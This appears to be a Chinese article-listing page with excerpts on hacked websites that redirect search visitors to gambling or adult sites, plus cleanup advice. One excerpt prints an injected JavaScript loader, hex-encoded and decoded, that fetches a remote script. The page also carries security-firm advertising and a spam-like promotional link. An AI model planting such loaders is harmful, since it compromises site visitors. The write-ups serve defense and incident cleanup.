精华内容
下载资源
问答
  • 从百度这里点击进去,我的网站会直接跳转到赌博网站上去,我一开始以为 ... 都会自动跳转到赌博网站上去,难不成是我网站出问题了...过,但一直都用的好好的就是最近网站被客户投诉说是跳转到博彩网站上去,我才 ...
    从百度这里点击进去,我的网站会直接跳转到赌博网站上去,我一开始以为
    是百度有问题了,我再从其他搜索引擎试了一下,360搜索,搜狗搜索点击进去,
    都会自动跳转到赌博网站上去,难不成是我网站出问题了? 
    我自己做的网站都有三四年的时间了,用的开源phpcms开发的程序,自己二次开发
    过,但一直都用的好好的就是最近网站被客户投诉说是跳转到博彩网站上去,我才
    开始注意这个问题了,先检查下自己网站在搜索引擎的收录情况吧:
    如何查看我的网站在百度里的收录情况?
    打开百度输入以下内容:
    SITE:www.我的网站地址.com
     
    如下图所示:
    搜索引擎快照是我网站的内容,往下翻个几页竟然出现一些博彩的内容了,什么澳
    门新葡京,赌博游戏,开奖结果等的内容,但是点开过后会跳转到赌博网站上面去
    ,并会被360安全拦截提示,未经证实的博彩赌博网站。您访问的网站含有未经证
    实的境外博彩或非法赌博的相关内容,可能给您造成财产损失,请您谨慎访问。
    如下图所示:

    如何解决打开网站跳到别的网站?下面开始我的解决之路了。

     
    先连接我的FTP,进去看下我的程序代码有没有可疑的问题,像网站的根目录里无
    缘无故出现了一些陌生的文件名什么的,检查JS文件有无被篡改,于是静下心来对
    每个程序代码,都详细的看了一遍,在JS目录下的jquery.min.js文件发现一段混
    迹加密的代码,按理说都应该是不加密的,为何这段给加密了呀。

    既然是混迹加密的代码,那就给他解密看下到底是什么代码,解密后如下:
    直接在Chrome浏览器里运行一下,为了让大家更清楚的看到问题的本质,理顺下这
    个代码的作用以及思路:第一步,快照内容的关键词替换;第二步,构造语句函数
    ,第三步,采集内容提供给蜘蛛看,第四步,需要跳转到的网址。
    这个代码支持从百度搜索引擎、360so、sogou、搜狗搜索、等等的网站。大家可以
    试试这些站点之外的其他搜索引擎或站点,如BING,就不会进行跳转。是有跳转条
    件判断的,如果是以上的网站来的点击,就会自动跳转到博彩,赌博,时时彩网站
    上去。
    解决打开网站跳到别的网站方案:
    1.   删除JS里的混迹加密代码,并做下JS目录的权限为只读权限。
          为何网站JS内容被篡改,应该是网站存在漏洞。
    2、 网站代码漏洞,这需要有安全意识的程序员才能修复得了,通常是在出现被挂  马以后才知道要针对哪方面入手修复;
    3、也可以通过网站安全公司来解决。
    4、服务器目录权限的“读”、“写”、“执行”,“是否允许脚本”,等等,使用经营已久的虚拟空间提供商的空间,可以有效降低被挂马的几率
    展开全文
  • 网站被黑入侵被挂马跳转如何解决? 昨天,发现客户的公司官网黑了,标题是正常的,点击进去却跳转到了博彩网站。 这里记录一下,我的解决方法。(不一定适用每一个网站) 首先是主页在百度排名的显示情况,如下图...

    网站被黑入侵被挂马跳转如何解决?

    昨天,发现客户的公司官网被黑了,标题是正常的,点击进去却跳转到了博彩网站。

    这里记录一下,我的解决方法。(不一定适用每一个网站)

    首先是主页在百度排名的显示情况,如下图被修改之后(百度更新也太及时了,上午发现的下午就更新了。):

    为什么明明标题被修改,但是在上面显示的还是之前我们自己设置的?

    主要是加入了以下的代码:

    我测试了一下,大家可以看看:

    而后被修改的标题是经过编码转换放入的:

    我的解决措施:

    1、修改ftp、后台密码、数据库密码等信息;

    2、网站备份;

    3、查找后台的可疑文件,一般网站被黑很可能是一句话木马所导致;

    一句话木马:一句话木马是为后期上传和提权做准备,具有一定的隐蔽性。

    最后找到一些可疑文件:

    第一处:

     

     

    这里全部都是html文件,突然有个aspx文件,令人生疑。

    第二处:

     

    这里引入了一个看似正常的style样式文件其实一点不正常,正常样式引入是

    这样标签,但是这里却使用了引入模板方式那肯定不正常。

    最后找到这两处地方,删除即可。

    这个时候大家还得注意,网站跳转代码的问题,

    eval后面都是一串经过编码转换的跳转地址,一般在首页文件,找到删除。

    1)最直接的方式:如果是简单的挂黑链和添加页面,那么直接删除,把权重设置一下如果是全设置很多,这样建议关闭网站,

       百度统计后台有关闭网站的功能,可以直接选择关闭,但这个处理方式最不建议使用。

     

    2)最彻底的方式:启用网站备份文件,在网站被黑之前,我就要对相应的数据库和文件进行备份,这样能更好的保证网站安全,

       同时网站在被黑的情况下也能很快恢复网站的运营,这个是最常见的处理方式。

     

    3)要及时提交死链给百度等主要搜索引擎,推荐在一个404 TXT列出所有死链,然后上传FTP根目录下,把地址提交给百度即可,

       没有404页面的 一定要设置404页面,千万不要忽略了。

     

    4)robots 文件的设置,把删除死链的相关文件设置不允许抓取就行了。

     

    5)坚持一段时间的高质量内容更新和适当的外链发布。

     

    6)更换一下系统管理员密码,设置复杂点,然后网站的程序该升级的进行升级,特别是cms程序,如织梦程序。

     

    7)定期对网站进行安全检测:1,日志检查 2,网站收录检查 3,网站文件检查。一般通过文件修改时间来判断。定期做好网站安全检测,这样才能及时发现并解决问题,从而有效减低损失。

     

    8)设置好目录和文件权限,定期更新和升级网站程序。如果还是被反复篡改建议找专业的安全公司来处理,国内也就找Sinesafe和绿盟等可以专业的处理.

    专注于安全领域 解决网站安全 解决网站被黑 网站被挂马 网站被篡改 网站安全、服务器安全提供商-www.sinesafe.com --专门解决其他人解决不了的网站安全问题.
    展开全文
  • 网站被挂马跳转劫持跳转到H APP下载页。 挂马的完整PC端正常无异常,移动页面js跳转,增加了一个js跳转。 挂马图片 通过日志查看挂马过程 该漏洞是利用苹果CMS的API执行SHELL, 挂马文件在模板的jquery.min.js ;...

    网站被挂马跳转劫持跳转到H APP下载页。

    被挂马的完整PC端正常无异常,移动页面js跳转,被增加了一个js跳转。

    挂马图片

    通过日志查看挂马过程

    该漏洞是利用苹果CMS的API执行SHELL,

    挂马文件在模板的jquery.min.js

    ;var head=document.getElementsByTagName(‘head’)[0];var script=document.createElement(‘script’);script[‘src’]=’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x63\x63\x6d\x73\x2e\x7a\x32\x33\x2e\x77\x65\x62\x2e\x63\x6f\x72\x65\x2e\x77\x69\x6e\x64\x6f\x77\x73\x2e\x6e\x65\x74\x2f\x37\x33\x32\x64\x2e\x6a\x73’;head.appendChild(script);
    解密之后是

    var head = document.getElementsByTagName(‘head’)[0];
    var script = document.createElement(‘script’);
    script[‘src’] = ‘https://maccms.z23.web.core.windows.net/732d.js’;
    head.appendChild(script);
    清除代码

    关闭后台采集API功能。或自定义API接口名字,
    欢迎关注我的网站http://sexrenge.com

    展开全文
  • 最近收到一位客户的反馈,告知网站被挂马,(织梦程序真让人头疼总是被挂马,dedecms经常是被挂马真晕了是的~)相信站长们都有遇到过网站被挂马或代码恶意植入的问题。下面把处理流程写下来,帮助大家了解并简单...

    最近收到一位客户的反馈,告知网站又被挂马,(织梦程序真让人头疼总是被挂马,dedecms经常是被挂马真晕了是的~)相信站长们都有遇到过网站被挂马或代码恶意植入的问题。下面把处理流程写下来,帮助大家了解并简单处理的过程。

    1,分析收录

    通过百度指令分析一下收录情况。

    百度搜索 site: lcshhgg.cn可以看到收录不少垃圾页面。如图:

    e225c89079a74ce49f304009d829d5ff.png

    网站被挂马收录的一些页面快照

    2d8912da6ff64803a44dfd2a066dce4c.png

    点击几条收录均为这些动态的URL路径

    d99dec050b444ca0bc89dc4af0b59795.png

    网站木马路径

    分析得出网站中被植入了一些PHP网页木马,大量的生成调用动态的垃圾页面。接下来,连接FTP进行删除清理操作。

    2,通过FTP目录排查恶意网马

    通过FTP工具登录到网站的FTP根目录,分析查找到这些植入的PHP文档(一般情况下很容易分析出)或者请网站的技术人员帮助分析查找。

    如图:

    2c6ca4a8b1a54af5939e92efabc5e26c.png

    网站被挂马的webshell文件

    可以看到这些PHP文档就是恶意网页生成的元凶。全部进行删除,并且把FTP里面的全检查一遍,彻底清除恶意代码。再详细检查下其他目录的修改时间以及可疑文件,如果不确定木马的话 建议找专业做安全的Sine安全来处理。

    3,全站查杀网站木马清除木马后门

    为了彻底清除被植入的恶意网马,建议把网站源码打包进行病毒查杀。用sinesafe木马检测工具进行全站的查杀与扫描。

    71099921d16f463a97406ac537ea5803.png

    转载于:https://my.oschina.net/u/3887295/blog/1836483

    展开全文
  • 2020年刚开始,苹果CMS爆出数据库代码执行漏洞,大量的电影网站被挂马,尤其电影的页面篡改植入了恶意代码,数据库中的VOD表里的d_name全部修改,导致网站打开后直接跳转到S站或者弹窗广告,目前该maccms漏洞...
  • 解决网站快照内容被篡改跳转被挂马的问题 比如:恶意内容等的就可以判断为网站被黑了,首页里含有虚假信息是因为被攻击者篡改了内容,而被百度安全检测到,并被百度风险拦截,以保障浏览网站用户的安全。 建议对网站...
  • 前几天,有一客户向我们SINE安全公司反映,网站在google上的推广已拒登,说什么网站存在恶意软件或垃圾软件,导致google广告无法上线,还发现网站从google搜索点击进去会直接跳转到其他网站上,直接输入网址不会跳转...
  • 网站被挂马,非管理员访问自动跳转到广告页面 怎么解决 discuz挂马弹出页面 经过葱子我细心的对挂马网站做排查,终于让我找到了问题所在。 挂马者是通过在discuz的头部js文件里面添加了劫持js代码,通过判断访问者的...
  • 目前官方已经停止对老版本的补丁更新与升级,直接在X3.4上更新了,最近我们SINE安全在对其安全检测的时候,发现网站漏洞,该漏洞是由于用户登录论坛的时候调用的微信接口,导致可以进行任意登录,甚至可以登录到管理...
  • 网站被挂马,谨防IIS模块挂马

    千次阅读 2019-09-12 14:33:42
    今天遇到一个很奇怪的挂马问题,查关键词,查数据库等...添加的名称很具有迷惑性,通常伪装的很像系统模块,遇到查不到是什么地方挂马,可以放一个探针来判断下是不是iis问题。 » 转载请保留出处:豫章小站...
  • 网站安全是重中之重对此我们Sinesafe对于网站被挂马被黑的防范意识,如何判断网站被黑,网站被挂马,网站快照劫持,网站快照篡改,导致百度网址安全中心提醒您:该页面可能存在违法信息。 网站服务是否稳定,对...
  • 目前官方已经停止对老版本的补丁更新与升级,直接在X3.4上更新了,最近我们SINE安全在对其安全检测的时候,发现网站漏洞,该漏洞是由于用户登录论坛的时候调用的微信接口,导致可以进行任意登录,甚至可以登录到管理...
  • 我的网站被挂马了,用手机打开首页,即跳转到色站了,看了几个小时的代码都看不出毛病,哪位大侠帮我把挂马的代码找出来啊 网址是www.hhhss.net
  • 目前官方已经停止对老版本的补丁更新与升级,直接在X3.4上更新了,最近我们SINE安全在对其安全检测的时候,发现网站漏洞,该漏洞是由于用户登录论坛的时候调用的微信接口,导致可以进行任意登录,甚至可以登录到管理...
  • 网站挂马 常见挂马方式 框架(iframe)挂马 <iframe src=http://www.trojan.com/ width=0 height=0></iframe> //宽度和高度都为0 js文件挂马 <script src=http://www.trojan.com/1.js>&...
  • 网站被挂马?别着急慢慢找

    千次阅读 2018-11-12 23:10:52
    网站挂马 在我们平时维护网站的时候,我们经常会发现我们的百度站点,攻击,点击自己的官网会跳转至赌博网站或者空白页面,别怕,此时,我们仔细发现一下,其实问题很容易解决。 相对域名劫持,网站挂马很容易...
  • 网站在百度的快照内容里出现一些菠菜,彩票的内容,从百度点进去后直接跳转到菠菜网站上去了,立即查看了下网站目录文件内容发现上传了一些可疑的文件内容 通过分析发现网站百度快照劫持跳转,就是你在百度搜索...
  • 相信很多的朋友都有遇见过,通过百度快照访问一个网站被跳转到另一个目标网站。 这就说明网站被劫持了,那么黑客为什么要劫持这些网站呢?黑客一般选择什么样的网站下手?下面我们就一起分析一下。 首先黑客一般...
  • wordpress本身的安全性是非常的高的,一般不会轻易的破解,被挂马,但是我们也不能够过度迷信wordpress的安全性,凡是连接上互联网的服务器和电脑,都存在破解的风险性。所以我们在日常维护自己的网站时,一定要...
  • 最近单位网站在百度搜索点击打开都是黄色的,而直接输入网址反而没问题,在百度搜索中提示为网站被黑的可能,很多客户搜索我们网站都进入了黄色网站,给公司的形象造成了很大的影响,作为公司的网站技术人员,以前...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,051
精华内容 420
关键字:

网站被挂马跳转